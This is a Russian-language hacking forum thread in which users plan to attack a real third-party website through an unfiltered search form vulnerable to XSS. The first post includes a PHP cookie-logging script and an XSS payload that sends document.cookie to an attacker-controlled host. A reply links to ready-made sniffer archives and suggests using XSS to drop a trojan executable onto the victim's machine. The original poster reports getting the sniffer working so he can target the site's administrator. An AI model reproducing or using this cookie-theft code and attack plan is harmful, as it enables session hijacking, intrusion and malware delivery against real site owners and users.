День добрый. Наткнулся недавно на одном сайте на форму, в которой вообще не идет фильтрация. Т.е. <script>alert()</script> проходит. Причем сначала пытался замаскировать скрипт, но потом выяснил, что все и так проходит. Это форма поиска, движок самописный, на полноценном хосте. Отсюда вопрос- что с такой формы можно поиметь? Насколько я понял из статей, можно вставить ссылку на сниффер и кинуть админу, тем самым подтибрив его куки. Но этот способ не самый подходящий, т.к. цель- рут/бд, а не админка на сайте. Если куки- единственный вариант, то как все-таки зарегить снифер на античате? Прохожу процесс регистрации, но там сказано- если вводили пароль, то придется ввести его и при входе в сниффер. Но на деле пароль и логин не спрашиваются. Пробовал также сделать собственный сниффер. Code: <?php> $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); ?> Вставлял ссылку http://***.ru/***<script>document.location.replace('http://***2.ru/sniff.php?com='+document.cookie);</script> Соотвественно, выложил на бесплатный хост jino-net.ru, создал файл cookies.txt, установил права на запись. Но все равно не пашет, размер файла не меняется с 0 кб. Все таки, интересуют другие варианты использования XSS, но в инете вылезеют десятки однотипных статей по куки. Буду признателен за помошь.
Вот хороший сниффер. _http://kanick.ru/sniffer/public.rar _http://kanick.ru/sniffer/personal.rar Можно еще с помощью XSS загрузит на комп жертвы "трой" *.exe (ну или другой исполняемый файл) Смотри видео Zadoxlikа _http://video.antichat.ru/file46.html
Пасиб, посмотрел. Баг ИЕ с загрузкой файла уже не работает, естественно, но идея хорошая. Можно попробовать другой сплоит засунуть. Этот сниффер тоже не пашет(( заливаю на jino-net.ru, выставляю нужные права- все равно "ошибка 500". А другой хост придется ждать, пока зарегестируют, мой на h15 похерили уже((
Тебе кто сказал, что он не работает, знаешь скока народу на ИЕ 6 до сих пор сидит, так что ещё как работает
На своей машине проверил, ИЕ 6 меня послал. Правда заплатки стоят все. Админ просто большой фанат ИЕ, у него точно заплатки, мб даже ИЕ 7 стоит. Сниффер заработал кста. Там файл .htacces вызывал ошибку 500 по неясной причине. На себе пока проверяю работу))
